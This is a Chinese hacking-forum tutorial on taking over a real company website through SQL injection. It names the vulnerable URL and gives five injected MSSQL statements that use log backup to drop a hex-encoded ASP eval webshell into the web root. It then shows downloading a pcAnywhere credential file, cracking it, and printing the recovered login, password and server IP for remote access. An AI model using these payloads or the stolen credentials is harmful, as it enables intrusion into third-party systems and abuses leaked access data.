点击获取更多： DB_OWNER,权限注入,pcAnywhere,连接 相关下载

　

大家好，我是一丝不挂，今天给大家带来的教程是DB_OWNER权限下得到shell 并且远程登陆

今天要用到的工具是一.help.asp[大马一只]
                  二.PcAnywhere密码破解.exe
                  三.pcAnywhere汉化版 我没找到 呵呵
                  四.lake2的eval最小马发送端
                  五.DSQLTools.exe
                  六.NBSI2API.exe
好了 就这样吧  现在开始做教程

现在我已经得到了一只DB_OWNER权限的鸡吧 呵呵

现在我们打开啊D

http://www.jamemost.com.cn/English/product_list.asp?ProductCatID=15&ProductID=20 这是存在的注入点

看到了吧 DB_OWNER权限  现在我们要做的是查找站的跟目录 D:\Webhome\jamemost\web\ 这个是站的跟目录

现在我们要用到log 备份得到权限 .由于我用的是2.5的 不支持自动上传 现在我手动上传

大家看我操作  这里的a 是连接密码 相关的教程里面都会有解释D:\Webhome\jamemost\web\这是站的跟目录 刚刚已经讲过了 现在我给大家演示一下

要用到的命令是
';alter database JiaMao set RECOVERY FULL--
';create table cmd (a image)--
';backup log JiaMao to disk = 'e:\cmd' with init--
';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
';backup log JiaMao to disk = 'D:\Webhome\jamemost\web\lalala.asp'--

5步操作 现在我们打开../lalala.asp

已经成功，现在我们用lake2的eval最小马连接.

估计我掉线了 今天网吧真垃圾！~

不好意思了 好了 嘿嘿 现在继续..

Save to D:\Webhome\jamemost\web\lalala1.asp Success ! 上传成功了.现在我们连接一下

刚刚密码被我改成123456了 我们登陆 进来了 首先我们看一下能不能CMD

wscript.shell √ 命令行执行组件  支持的

没有权限..所以我们只能看下serv-u 提权试试 3389也没有开放..我们只好找找别的漏洞了

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 嘿嘿..现在开始下载它的2PCA.ourspinxi.CIF CIF格式的哦..看清楚下

下好后我们用PcAnywhere密码破解.exe 破解 直接拖到里面就好了

User information:
Login name: ourspinxi
Password: %*#%!)^@

现在我们用pcanywhere 连接试试  这里是它的IP 222.73.250.93 这里 好了 我们连接看下

然后输入帐号密码 被锁屏了 没法演示了 这里我给大家只是一种思路 要学会利用

好了 教程就做到这吧 还有一点 刚刚忘说了  我刚指的那三个地方应该填上当前库的名字 切记哦

我的Q 136010025

有不懂的可以问我..88了

* 注意:下载本站软件请使用迅雷软件下载，速度更快、更稳定。 本站统一解压密码为:www.05112.org
* 如果是下载黑客相关软件，请注意自行杀毒！
* 如果您发现该软件不能下载，请通知管理员，谢谢！
* 未经本站明确许可，任何网站不得非法盗链及抄袭本站资源；如引用页面，请注明来自本站，谢谢您的支持！
* 本站软件均收集于网络，如有侵犯您的产权请及时联系我们，我们会在得到反映的24小时内删除这些下载及相应信息！